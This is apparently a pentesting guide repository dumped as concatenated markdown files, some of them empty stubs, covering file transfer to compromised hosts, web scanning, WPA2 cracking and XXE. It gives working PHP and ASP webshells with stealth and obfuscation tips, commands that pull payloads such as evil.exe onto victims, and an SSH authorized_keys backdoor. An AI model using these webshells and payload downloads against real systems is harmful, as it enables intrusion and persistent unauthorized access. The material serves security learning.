  5 | For the examples using `curl`  and `wget` we need to download from a web-server. This is an easy way to set up a web-server. This command will make the entire folder, from where you issue the command, available on port 9999.
  6 | 
  7 | ```
  8 | python -m SimpleHTTPServer 9999
  9 | ```
 10 | 
 11 | ## Wget
 12 | 
 13 | You can download files using `wget` like this:
 14 | 
 15 | ```
 16 | wget 192.168.1.102:9999/file.txt
 17 | ```
 18 | 
 19 | ## Curl
 20 | 
 21 | ```
 22 | curl -O http://192.168.0.101/file.txt
 23 | ```
 24 | 
 25 | ## Netcat
 26 | 
 27 | Another easy way to transfer files is by using netcat.
 28 | 
 29 | If you can't have an interactive shell it might be risky to start listening on a port, since it could be that the attacking-machine is unable to connect. So you are left hanging and can't do `ctr-c` because that will kill your session.
 30 | 
 31 | So instead you can connect from the target machine like this.
 32 | 
 33 | On attacking machine:
 34 | 
 35 | ```bash
 36 | nc -lvp 4444 < file
 37 | ```
 38 | 
 39 | On target machine:
 40 | 
 41 | ```bash
 42 | nc 192.168.1.102 4444 > file
 43 | ```
 44 | 
 45 | You can of course also do it the risky way, the other way around:
 46 | 
 47 | So on the victim-machine we run `nc` like this:
 48 | 
 49 | ```bash
 50 | nc -lvp 3333 > enum.sh
 51 | ```
 52 | 
 53 | And on the attacking machine we send the file like this:
 54 | 
 55 | ```bash
 56 | nc 192.168.1.103 < enum.sh
 57 | ```
 58 | 
 59 | I have sometimes received this error:
 60 | 
 61 | ```
 62 | This is nc from the netcat-openbsd package. An alternative nc is available
 63 | ```
 64 | 
 65 | I have just run this command instead:
 66 | 
 67 | ```
 68 | nc -l 1234 > file.sh
 69 | ```
 70 | 
 71 | 
 72 | ## With php
 73 | 
 74 | ```
 75 | echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
 76 | ```
 77 | 
 78 | ## Ftp
 79 | 
 80 | If you have access to a ftp-client to can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted!!!
 81 | 
 82 | ## Tftp
 83 | 
 84 | On some rare machine we do not have access to `nc` and `wget`, or `curl`. But we might have access to `tftp`. Some versions of `tftp` are run interactively, like this:
 85 | 
 86 | ```
 87 | $ tftp 192.168.0.101
 88 | tftp> get myfile.txt
 89 | ```
 90 | 
 91 | If we can't run it interactively, for whatever reason, we can  do this trick:
 92 | 
 93 | ```
 94 | tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"
 95 | ```
 96 | 
 97 | ### SSH - SCP
 98 | 
 99 | If you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files.
100 | 
101 | So, in the `/home/user` directory you can find the hidden `.ssh` files by typing `ls -la`.
102 | Then you need to do two things.
103 | 
104 | 1. Create a new keypair
105 | 
106 | You do that with: 
107 | 
108 | ```
109 | ssh-keygen -t rsa -C "your_email@example.com"
110 | ```
111 | 
112 | then you enter a name for the key.
113 | 
114 | Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKey
115 | Enter passphrase (empty for no passphrase): 
116 | Enter same passphrase again:
117 | 
118 | This will create two files, one called `nameOfMyKey` and another called `nameOfMyKey_pub`. The one with the `_pub` is of course your public key. And the other key is your private.
119 | 
120 | 2. Add your public key to authorized_keys.
121 | 
122 | Now you copy the content of `nameOfMyKey_pub`. 
123 | On the compromised machine you go to `~/.ssh` and then run add the public key to the file authorized_keys. Like this 
124 | 
125 | ```bash
126 | echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys
127 | ```
128 | 
129 | 3. Log in.
130 | 
131 | Now you should be all set to log in using your private key. Like this
132 | 
133 | ```
134 | ssh -i nameOfMyKey kim@192.168.1.103
135 | ```
136 | 
137 | ### SCP
138 | 
139 | Now we can copy files to a machine using `scp`
140 | 
141 | ```
142 | # Copy a file:
143 | scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext
144 | 
145 | # Copy a directory:
146 | scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination
147 | ```


--------------------------------------------------------------------------------
/transfering_files2.md:
--------------------------------------------------------------------------------
1 | # Transferring Files
2 | 
3 | This section could easily be put in the post-exploitation section. But I consider this knowledge so fundamental that I chose to put it here.
4 | 
5 | 
6 | 


--------------------------------------------------------------------------------
/transfering_files_to_windows.md:
--------------------------------------------------------------------------------
  1 | # Transferring Files to Windows
  2 | 
  3 | Transferring files to Linux is usually pretty easy. We can use `netcat`, `wget`, or `curl`, which most systems have as default. But windows does not have these tools.
  4 | 
  5 | ## FTP
  6 | 
  7 | Most windows machines have a ftp-client included. But we can't use it interactively since that most likely would kill our shell. So we have get around that. We can however run commands from a file. So what we want to do is to echo out the commands into a textfile. And then use that as our input to the ftp-client. Let me demonstrate.
  8 | 
  9 | On the compromised machine we echo out the following commands into a file
 10 | 
 11 | ```
 12 | echo open 192.168.1.101 21> ftp.txt
 13 | echo USER asshat>> ftp.txt
 14 | echo mysecretpassword>> ftp.txt
 15 | echo bin>> ftp.txt
 16 | echo GET wget.exe>> ftp.txt
 17 | echo bye>> ftp.txt
 18 | ```
 19 | 
 20 | Then run this command to connect to the ftp
 21 | 
 22 | ```
 23 | ftp -v -n -s:ftp.txt
 24 | ```
 25 | 
 26 | Of course you need to have a ftp-server configured with the user asshat and the password to mysecretpassword.
 27 | 
 28 | ## TFTP
 29 | 
 30 | Works by default on:  
 31 | 
 32 | **Windows XP**  
 33 | 
 34 | **Windows 2003**
 35 | 
 36 | A TFTP client is installed by default on windows machines up to Windows XP and Windows 2003. What is good about TFTP is that you can use it non-interactively. Which means less risk of losing your shell.
 37 | 
 38 | Kali has a TFTP server build in.  
 39 | You can server up some files with it like this
 40 | 
 41 | ```
 42 | atftpd --daemon --port 69 /tftp
 43 | /etc/init.d/atftpd restart
 44 | ```
 45 | 
 46 | Now you can put stuff in `/srv/tftp` and it will be served. Remember that TFTP used UDP. So if you run `netstat` it will not show it as listening.
 47 | 
 48 | You can see it running like this
 49 | 
 50 | ```
 51 | netstat -a -p UDP | grep udp
 52 | ```
 53 | 
 54 | So now you can upload and download whatever from the windows-machine like this
 55 | 
 56 | ```
 57 | tftp -i 192.160.1.101 GET wget.exe
 58 | ```
 59 | 
 60 | If you like to test that the tftp-server is working you can test it from Linux, I don't think it has a non-interactive way.
 61 | 
 62 | ```
 63 | tftp 192.160.1.101
 64 | GET test.txt
 65 | ```
 66 | 
 67 | I usually put all files I want to make available in `/srv/tftp`
 68 | 
 69 | If you want to make sure that the file was uploaded correct you can check in the syslog. Grep for the IP like this:
 70 | 
 71 | `grep 192.168.1.101 /var/log/syslog`
 72 | 
 73 | ## VBScript
 74 | 
 75 | Here is a good script to make a wget-clone in VB.
 76 | 
 77 | If it doesn't work try piping it through unix2dos before copying it.
 78 | 
 79 | ```
 80 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs
 81 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
 82 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
 83 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
 84 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
 85 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
 86 | echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
 87 | echo Err.Clear >> wget.vbs
 88 | echo Set http = Nothing >> wget.vbs
 89 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
 90 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
 91 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
 92 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
 93 | echo http.Open "GET",strURL,False >> wget.vbs
 94 | echo http.Send >> wget.vbs
 95 | echo varByteArray = http.ResponseBody >> wget.vbs
 96 | echo Set http = Nothing >> wget.vbs
 97 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
 98 | echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
 99 | echo strData = "" >> wget.vbs
100 | echo strBuffer = "" >> wget.vbs
101 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
102 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
103 | echo Next >> wget.vbs
104 | echo ts.Close >> wget.vbs
105 | ```
106 | 
107 | You then execute the script like this:
108 | ```
109 | cscript wget.vbs http://192.168.10.5/evil.exe evil.exe
110 | ```
111 | 
112 | ## PowerShell
113 | 
114 | This is how we can download a file using PowerShell. Remember since we only have a non-interactive shell we cannot start PowerShell.exe, because our shell can't handle that. But we can get around that by creaing a PowerShell-script and then executing the script:
115 | 
116 | ```
117 | echo $storageDir = $pwd > wget.ps1
118 | echo $webclient = New-Object System.Net.WebClient >>wget.ps1
119 | echo $url = "http://192.168.1.101/file.exe" >>wget.ps1
120 | echo $file = "output-file.exe" >>wget.ps1
121 | echo $webclient.DownloadFile($url,$file) >>wget.ps1
122 | ```
123 | 
124 | Now we invoke it with this crazy syntax:
125 | 
126 | ```powershell
127 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
128 | ```
129 | 
130 | ## Debug.exe
131 | 
132 | This is a crazy technique that works on windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
133 | 
134 | `Debug.exe` can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that:
135 | 
136 | ```
137 | upx -9 nc.exe
138 | ```
139 | 
140 | Now it only weights 29 kb. Perfect. So now let's disassemble it:
141 | 
142 | ```
143 | wine exe2bat.exe nc.exe nc.txt
144 | ```
145 | 
146 | Now we just copy-past the text into our windows-shell. And it will automatically create a file called nc.exe
147 | 
148 | 


--------------------------------------------------------------------------------
/users.md:
--------------------------------------------------------------------------------
1 | # Users
2 | 
3 | 
4 | social-searcher.com
5 | 
6 | Reddit
7 | Snoopsnoo
8 | 


--------------------------------------------------------------------------------
/vim.md:
--------------------------------------------------------------------------------
  1 | # Vim
  2 | 
  3 | [http://www.viemu.com/a-why-vi-vim.html](http://www.viemu.com/a-why-vi-vim.html)  
  4 | And also this classic answer: [https://stackoverflow.com/questions/1218390/what-is-your-most-productive-shortcut-with-vim](https://stackoverflow.com/questions/1218390/what-is-your-most-productive-shortcut-with-vim)
  5 | 
  6 | ## Core concepts
  7 | 
  8 | In vim you have the concept of buffers.
  9 | 
 10 | ```bash
 11 | # List buffers
 12 | :buffers
 13 | 
 14 | # Switch buffer
 15 | # By number
 16 | b1
 17 | b2
 18 | # By name
 19 | b [name]
 20 | 
 21 | 
 22 | # Close/delete a buffer
 23 | :bdelete
 24 | :bd
 25 | ```
 26 | 
 27 | ## Movement - Motion commands
 28 | 
 29 | **Left,up,down,right**
 30 | 
 31 | `hjkl`
 32 | 
 33 | **start of line**
 34 | 
 35 | `0` \(zero\)
 36 | 
 37 | **end of line**
 38 | 
 39 | `$`
 40 | 
 41 | **beginning of next word**
 42 | 
 43 | `w`
 44 | 
 45 | **beginning of next word, defined by white space**
 46 | 
 47 | `W`
 48 | 
 49 | **end of the next word**
 50 | 
 51 | `e`
 52 | 
 53 | **end of the next word, defined by white space**
 54 | 
 55 | `E`
 56 | 
 57 | **back to the beginning of previous word**
 58 | 
 59 | `b`
 60 | 
 61 | **back to the end of previous word**
 62 | 
 63 | `B`
 64 | 
 65 | **go to next character of your choice**
 66 | 
 67 | If you want to go to the next comma
 68 | 
 69 | `f,`
 70 | 
 71 | **start of file**
 72 | 
 73 | `gg`
 74 | 
 75 | **end of file**
 76 | 
 77 | `G`
 78 | 
 79 | ## Operators
 80 | 
 81 | Operators are commands that do things. Like delete, change or copy.
 82 | 
 83 | `c` - change  
 84 | `ce` - change until end of the word.  
 85 | `c$` - change until end of line.
 86 | 
 87 | ## Combining Motions and Operators
 88 | 
 89 | Now that you know some motion commands and operator commands. You can start combining them.
 90 | 
 91 | `dw` - delete word  
 92 | `d$` - delete to the end of the line
 93 | 
 94 | ## Count - Numbers
 95 | 
 96 | You can add numbers before motion commands. To move faster.
 97 | 
 98 | `4w` - move cursor three words forward  
 99 | `0` - move curso to the start of the line
100 | 
101 | You can use numbers to perform operations.  
102 | `d3w` - delete three words
103 | 
104 | `3dd` - delete three lines
105 | 
106 | ## Replace
107 | 
108 | If you need to replace a character, there is no need to enter insert-mode. You can just use replace
109 | 
110 | Go to a character and the press `r` followed by the character you want instead.
111 | 
112 | `rp` if you want to replace p.
113 | 
114 | `R`
115 | 
116 | ## Clipboard
117 | 
118 | In order to copy something FROM vim to the OS-clipboard you can do this:
119 | 
120 | The `"` means that we are not entering a registry. And the `*` means the OS-clipboard. So we are yanking something and putting it in the OS-clipboard registry.
121 | 
122 | ```
123 | "*y
124 | ```
125 | 
126 | ## Substitute - Search and replace
127 | 
128 | :s/thee/the/g
129 | 
130 | ## Entering insert-mode
131 | 
132 | `i` - current character  
133 | `o` - next line  
134 | `O` - line before  
135 | `a` - end of word  
136 | `A` - end of line
137 | 
138 | ## .vimrc
139 | 
140 | Here is all your vim-configuration.
141 | 
142 | ## Plugins
143 | 
144 | Install vundle here  
145 | [https://github.com/VundleVim/Vundle.vim](https://github.com/VundleVim/Vundle.vim)
146 | 
147 | **Add plugin**
148 | 
149 | Add plugin to your .vimrc-file and then open vim and write
150 | 
151 | `:PluginInstall`
152 | 
153 | 


--------------------------------------------------------------------------------
/vulnerabilities.md:
--------------------------------------------------------------------------------
1 | # Vulnerabilities
2 | 
3 | There are a number of different common vulnerabilities that are found in binaries. In this chapter we are going to discuss some of the common ones.
4 | 
5 | The main idea behind these exploits is to corrupt the memory allocation to inject arbitrary code that gets executed by the program. 
6 | 
7 | 


--------------------------------------------------------------------------------
/vulnerability_analysi.md:
--------------------------------------------------------------------------------
1 | # Vulnerability analysis
2 | 
3 | 


--------------------------------------------------------------------------------
/vulnerability_analysi1s.md:
--------------------------------------------------------------------------------
1 | # Vulnerability analysis
2 | 
3 | So now you have done your recon and found services and their versions. You have looked in every corner of the target. Enumerated subdomains, scanned them, browsed through the webpage looking everywhere.
4 | 
5 | So, now it is time to see if any of these services contains any vulnerabilities.
6 | 


--------------------------------------------------------------------------------
/vulnerability_analysis.md:
--------------------------------------------------------------------------------
1 | # Vulnerability analysis
2 | 
3 | 


--------------------------------------------------------------------------------
/waf_-_web_application_firewall.md:
--------------------------------------------------------------------------------
 1 | # WAF - Web application firewall
 2 | 
 3 | 
 4 | One of the first things we should do when starting to poke on a website is see what WAF it has.
 5 | 
 6 | ## Identify the WAF
 7 | 
 8 | ```
 9 | wafw00f http://example.com
10 | ```
11 | 
12 | http://securityidiots.com/Web-Pentest/WAF-Bypass/waf-bypass-guide-part-1.html
13 | 


--------------------------------------------------------------------------------
/web-scanning.md:
--------------------------------------------------------------------------------
 1 | # Find hidden files and directories
 2 | 
 3 | ## TLDR
 4 | 
 5 | ```
 6 | # Dirb
 7 | dirb https://192.168.1.101
 8 | 
 9 | # Gobuster - remove relevant responde codes (403 for example)
10 | gobuster -u http://192.168.1.101 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
11 | ```
12 | 
13 | ## About
14 | 
15 | There is essentially no way for a user to know which files are found in which directories on a web-server, unless the whole server has directory listing by default. However, if you go directly to the page it will be shown. So what the attacker can do is to brute force hidden files and directories. Just test a bunch of them. There are several tools for doing this. The attack is of course very noisy and will show up fast in the logs.
16 | 
17 | ### Dirb
18 | 
19 | This is a really easy tool to use:
20 | 
21 | ```
22 | dirb http://target.com
23 | ```
24 | 
25 | ### Dirbuster
26 | 
27 | It is a GUI
28 | You start it with:
29 | 
30 | ```
31 | dirbuster
32 | ```
33 | 
34 | ### OWASP ZAP
35 | 
36 | Insert your target.
37 | Add it to the context
38 | Click the plus-sign
39 | Click on Forced Browse
40 | 
41 | ### Wfuzz
42 | 
43 | You can find the manual by typing: 
44 | ```
45 | wfuzz -h
46 | ```
47 | 
48 | ```
49 | wfuzz -c -z file,/root/.ZAP/fuzzers/dirbuster/directory-list-2.3-big.txt --sc 200 http://pegasus.dev:8088/FUZZ.php
50 | ```
51 | 
52 | ### Gobuster 
53 | 
54 | ```
55 | # Gobuster - remove relevant responde codes (403 for example)
56 | gobuster -u http://192.168.1.101 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
57 | ```
58 | 
59 | ## WAF - Web application firewall
60 | 
61 | It might be that dirb shows you 403 errors, instead of the expected 404. This might mean that there is a WAF protecting the site. To get around it we might have to change our request header to it looks more like a normal request. 
62 | 
63 | ```
64 | dirb http://target.com -a "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36"
65 | ```
66 | 


--------------------------------------------------------------------------------
/web-services.md:
--------------------------------------------------------------------------------
 1 | # Web-services
 2 | 
 3 | Vulnerabilities on the web can cause many different times of hacks. You can use it to get access to another users data. Or it can work as a step towards remote code execution.
 4 | 
 5 | A great way to see real examples of specific attack you can check hackerone.com like this through google: 
 6 | 
 7 | ```
 8 | site:hackerone.com clickjacking
 9 | ```
10 | 
11 | ## Visit OWASP top 10
12 | 
13 | This chapter is largely based on the OWASP top 10 vulnerabilities. So if you want a better explanation just check out their website.
14 | https://www.owasp.org/index.php/Top_10_2013-Top_10


--------------------------------------------------------------------------------
/webshell.md:
--------------------------------------------------------------------------------
  1 | # Webshell
  2 | 
  3 | A webshell is a shell that you can access through the web. This is useful for when you have firewalls that filter outgoing traffic on ports other than port 80. As long as you have a webserver, and want it to function, you can't filter our traffic on port 80 (and 443). It is also a bit more stealthy than a reverse shell on other ports since the traffic is hidden in the http traffic.
  4 | 
  5 | You have access to different kinds of webshells on Kali here:
  6 | 
  7 | ```
  8 | /usr/share/webshells
  9 | ```
 10 | 
 11 | ## PHP
 12 | 
 13 | This code can be injected into pages that use php.
 14 | ```php
 15 | 
 16 | # Execute one command
 17 | <?php system("whoami"); ?>
 18 | 
 19 | # Take input from the url paramter. shell.php?cmd=whoami
 20 | <?php system($_GET['cmd']); ?>
 21 | 
 22 | # The same but using passthru
 23 | <?php passthru($_GET['cmd']); ?>
 24 | 
 25 | # For shell_exec to output the result you need to echo it
 26 | <?php echo shell_exec("whoami");?>
 27 | 
 28 | # Exec() does not output the result without echo, and only output the last line. So not very useful!
 29 | <?php echo exec("whoami");?>
 30 | 
 31 | # Instead to this if you can. It will return the output as an array, and then print it all.
 32 | <?php exec("ls -la",$array); print_r($array); ?>
 33 | 
 34 | # preg_replace(). This is a cool trick
 35 | <?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
 36 | 
 37 | # Using backticks
 38 | <?php $output = `whoami`; echo "<pre>$output</pre>"; ?>
 39 | 
 40 | # Using backticks
 41 | <?php echo `whoami`; ?>
 42 | ```
 43 | 
 44 | You can then call then execute the commands like this:
 45 | 
 46 | ```
 47 | http://192.168.1.103/index.php?cmd=pwd
 48 | ```
 49 | 
 50 | ### Make it stealthy
 51 | 
 52 | We can make the commands from above a bit more stealthy. Instead of passing the cmds through the url, which will be obvious in logs, we cna pass them through other header-paramters. The use tampterdata or burpsuite to insert the commands. Or just netcat or curl.
 53 | 
 54 | ```php
 55 | <?php system($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>
 56 | <?php system($_SERVER['HTTP_USER_AGENT'])?>
 57 | 
 58 | # I have had to use this one
 59 | <?php echo passthru($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>
 60 | ```
 61 | 
 62 | ### Obfuscation
 63 | 
 64 | The following functions can be used to obfuscate the code.
 65 | 
 66 | ```
 67 | eval()
 68 | assert()
 69 | base64()
 70 | gzdeflate()
 71 | str_rot13()
 72 | ```
 73 | 
 74 | ### Weevely - Incredible tool!
 75 | 
 76 | Using weevely we can create php webshells easily.
 77 | 
 78 | ```
 79 | weevely generate password /root/webshell.php
 80 | ```
 81 | 
 82 | Not we execute it and get a shell in return:
 83 | 
 84 | ```
 85 | weevely "http://192.168.1.101/webshell.php" password
 86 | ```
 87 | 
 88 | ## ASP
 89 | 
 90 | ```
 91 | <%
 92 | Dim oS
 93 | On Error Resume Next
 94 | Set oS = Server.CreateObject("WSCRIPT.SHELL")
 95 | Call oS.Run("win.com cmd.exe /c c:\Inetpub\shell443.exe",0,True)
 96 | %>
 97 | ```
 98 | 
 99 | 
100 | ## References
101 | 
102 | http://www.acunetix.com/blog/articles/keeping-web-shells-undercover-an-introduction-to-web-shells-part-3/
103 | http://www.binarytides.com/web-shells-tutorial/


--------------------------------------------------------------------------------
/wep.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/wep.md


--------------------------------------------------------------------------------
/wget.md:
--------------------------------------------------------------------------------
 1 | # wget
 2 | 
 3 | Wget is just an incredible useful tool. It be used to download stuff.
 4 | 
 5 | If you need to use wget through a proxy you can do the following:
 6 | 
 7 | ```
 8 | wget "http://example.com/get_album_item.php?size=version%28%29%20;%20--" -O output.txt -e use_proxy=yes -e http_proxy=192.168.101.8:3128 --proxy-user "username" --proxy-password "password"
 9 | ```
10 | 


--------------------------------------------------------------------------------
/wifi.md:
--------------------------------------------------------------------------------
 1 | # Wifi
 2 | 
 3 | 
 4 | There are quite a few different security mechanism on wifi. And each of them require a different tactic. This article outlines the different strategies quite well. http://null-byte.wonderhowto.com/how-to/hack-wi-fi-selecting-good-wi-fi-hacking-strategy-0162526/
 5 | 
 6 | 
 7 | This is a great guide to the many different ways to hack wifi.
 8 | 
 9 | ### Checking what networks are avalible
10 | 
11 | `sudo iwlist wlan0 scanning` - scans for wifis
12 | 
13 | ### Hacking WPA2-wifis Using airmon-ng and cowpatty
14 | 
15 | What we are going to to here it basically just to record the 4-way handshake and then run a dictionary attack on it. The good part about this strategy is that you won't have to interfere to much with the network and thereby risk of taking down their wifi. The bad part is that if you run a dictionary attack there is always the possibility that the password just isn't in the list.
16 | 
17 | 1. Start airmon-ng
18 |  - `airmon-ng start wlan0`
19 |  - This puts the network card in monitoring mode.
20 |  - This will create a network interface that you can use to monitor wifi-action. This interface is usually called mon0 or something like that. You see the name when you run the command.
21 | 
22 | 2. Run airodump to see what is passing through the air
23 |  - Now we want to see what access points are available to us. 
24 |  - `airodump-ng -i mon0`
25 |  - This would output something like this:
26 | 
27 | ```
28 | CH 13 ][ Elapsed: 6 s ]
29 | 
30 | BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
31 | 
32 | E8:DE:27:31:15:EE  -62       40       54    0  11  54e  WPA2 CCMP   PSK  myrouter
33 | A7:B6:68:D4:1D:91  -80        7        0    0  11  54e  WPA2 CCMP   PSK  DKT_D24D81
34 | B4:EE:B4:80:76:72  -84        5        0    0   6  54e  WPA2 CCMP   PSK  arrisNetwork
35 | 
36 | BSSID       STATION            PWR   Rate    Lost    Frames Probe
37 | 
38 | E8:DE:27:31:15:EE  D8:A2:5E:8E:41:75  -57    0e- 1    537     14
39 | ```
40 | 
41 | So what is all this?
42 | `BSSID` - This is the mac-address of the access point.
43 | `PWR` - Signal strength. The higher (closer to 0) the strength the stronger is the signal. In the example above it is myrouter that has the strongest signal.
44 | `Beacon` - This is kind of like a packet that the AP sends out periodically. The beacon contains information about the network. It contains the SSID, timestamp, beacon interval. If you are curious you can just analyze the beacons in wireshark after you have captured them.
45 | `#Data` - The number of data-packets that has been sent.
46 | `#/s` - Number of data-packets per second.
47 | `CH` - Channel
48 | `MB` - Maximum speed the AP can handle. 
49 | `ENC` - Encryption type
50 | `CIPHER` - One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2.
51 | `PSK` - The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP).
52 | `ESSID` - The name of the network
53 | 
54 | Then we have another section of information.
55 | `Station` - MAC address of each associated station or stations searching for an AP to connect with. Clients not currently associated with an AP have a BSSID of “(not associated)”. So yeah, this basically means that we can see what devices are looking for APs. This can be useful if we want to create an evil twin or something like that.
56 | 
57 | 3. Find the network you want to access.
58 |  - `airodump-ng --bssid A7:B6:68:D4:1D:91 -c 11 -w cowpatty mon0`
59 |  - So this command will record or traffic from the device with that specific MAC-address. -c defines the channel. and `-w cowpatty` means that we are going to save the packet capture with that name. 
60 | Now we just have to wait for a user to connect to that network. And when he/she does we will record that handshake.
61 | We know that we have recorded a handshake when this appears
62 | `CH 11 ][ Elapsed: 19 hours 52 mins ][ 2016-05-19 17:14 ][ WPA handshake: A7:B6:68:D4:1D:91`
63 | Now we can exit airodump, and we can see that we have a cap-file with the name cowpatty-01.cap. That is our packet-capture, and you can open it and study it in wireshark if you like.
64 | 
65 | 4. Crack the password.
66 | - Now that we have the handshake recorded we can start to crack it. We can do that by using the program cowpatty.
67 | - `cowpatty -f /usr/share/wordlists/rockyou.txt -r cowpatty-01.cap -s DKT_D24D81`
68 | Then we just hope for the best.
69 | 
70 | 
71 | ##More
72 | Kicking other people off the network to capture handshakes faster:
73 | http://www.aircrack-ng.org/doku.php?id=newbie_guide
74 | 
75 | http://lewiscomputerhowto.blogspot.cl/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html
76 | 
77 | http://radixcode.com/hackcrack-wifi-password-2015-step-step-tutorial/
78 | 
79 | 


--------------------------------------------------------------------------------
/windows.md:
--------------------------------------------------------------------------------
1 | # Windows
2 | 
3 | Whether you like it or not Windows is the most common OS for desktop users in the world. So for a pentester it is fundamental to understand the ins and outs of it.
4 | 
5 | So this chapter will contain some basics about Windows and windows networks.
6 | 
7 | We will also look a bit at PowerShell and of course the good old CMD. 


--------------------------------------------------------------------------------
/windows_exploitation.md:
--------------------------------------------------------------------------------
 1 | # Windows exploitation
 2 | 
 3 | If you want to exploit a service on a windows machinebut you are using a linux you can compile and run the exploit from linux, like this:
 4 | 
 5 | 
 6 | ```
 7 | i686-w64-mingw32-gcc exploit.c -o exploit.exe 
 8 | ```
 9 | 
10 | Then run it like this
11 | 
12 | ```
13 | wine exploit.exe
14 | ```


--------------------------------------------------------------------------------
/wireshark.md:
--------------------------------------------------------------------------------
 1 | # Wireshark
 2 | 
 3 | So now that you have entered a network and intercepted the traffic it is time to analyze that traffic. That can be with wireshark.
 4 | 
 5 | ## Filters
 6 | 
 7 | There are two types of filters that we can use.
 8 | 1. Capture filter
 9 |  - This filters out in the capture process, so that it does not capture what you have not specified. 
10 | 2. Display filter
11 |  - This filter just filters what you see. You might have captured 1000 packets, but using the display filter you will only be shown say 100 packets that are relevant to you.
12 | 
13 | The syntax for the two filters are a bit different.
14 | 
15 | ### Capture filter
16 | So if you just start capturing all traffic on a network you are soon going to get stuck with a ton of packets. Too many! So we might need to refine out capture.
17 | 
18 | Click on the fourth icon from the left. If you hover over it it says `Capture options`
19 | 
20 | Some useful might be.
21 | From a specific host and with a specific port:
22 | ```
23 | host 192.168.1.102
24 | port 110
25 | ```
26 | 
27 | 
28 | ### Display filter
29 | 
30 | Show only packets used by this IP-address, or to a specific port
31 | ```
32 | ip.addr == 192.168.1.102
33 | tcp.port eq 25
34 | ```
35 | 
36 | ### Automatically resolve ip-addresses
37 | 
38 | Easy
39 | https://ask.wireshark.org/questions/37680/can-wireshark-automatically-resolve-the-ip-address-into-host-names
40 | 
41 | 


--------------------------------------------------------------------------------
/wps.md:
--------------------------------------------------------------------------------
1 | # WPS
2 | 
3 | 


--------------------------------------------------------------------------------
/write_exploits.md:
--------------------------------------------------------------------------------
1 | # Write exploits
2 | 
3 | If you want to write or port an exploit to metasploit this is how you can do it.
4 | 
5 | 
6 | 
7 | 
8 | 


--------------------------------------------------------------------------------
/xml_external_entity_attack.md:
--------------------------------------------------------------------------------
  1 | # XML External Entity Attack
  2 | 
  3 | With this attack you can do:
  4 | 
  5 | * Read local files
  6 | * Denial-of-service
  7 | * Perform port-scan
  8 | * Remote Code Execution
  9 | 
 10 | Where do you find it:
 11 | 
 12 | * Anywhere where XML is posted.
 13 | 
 14 | * Common with file-uploading functionality. For files that uses XML, like: docx, pptx, gpx, pdf and xml itself.
 15 | 
 16 | ### Background XML
 17 | 
 18 | XML is a markup language, like HTML. Unlike HTML is does not have any predefined tags. It is the user that create the tags in the XML object. XML is just a format for storing and transporing data. XML uses tags and subtags, just like html. Or parents, children, and syblings. So in that sense it has the same tree-structure as html.
 19 | 
 20 | To define a XML-section/document you need the following tag to begin:
 21 | 
 22 | ```
 23 | <?xml version="1.0" encoding="UTF-8"?>
 24 | ```
 25 | 
 26 | Example of valid XML:
 27 | 
 28 | ```
 29 | <?xml version="1.0"?>
 30 |     <change-log>
 31 |         <text>Hello World</text>
 32 |     </change-log>
 33 | ```
 34 | 
 35 | [https://www.owasp.org/index.php/XML\_External\_Entity\_\(XXE\)\_Processing](https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing)
 36 | 
 37 | ### Syntax rule
 38 | 
 39 | * Must have root element
 40 | * Must have XML prolog
 41 | 
 42 | ```
 43 | <?xml version="1.0" encoding="UTF-8"?>
 44 | ```
 45 | 
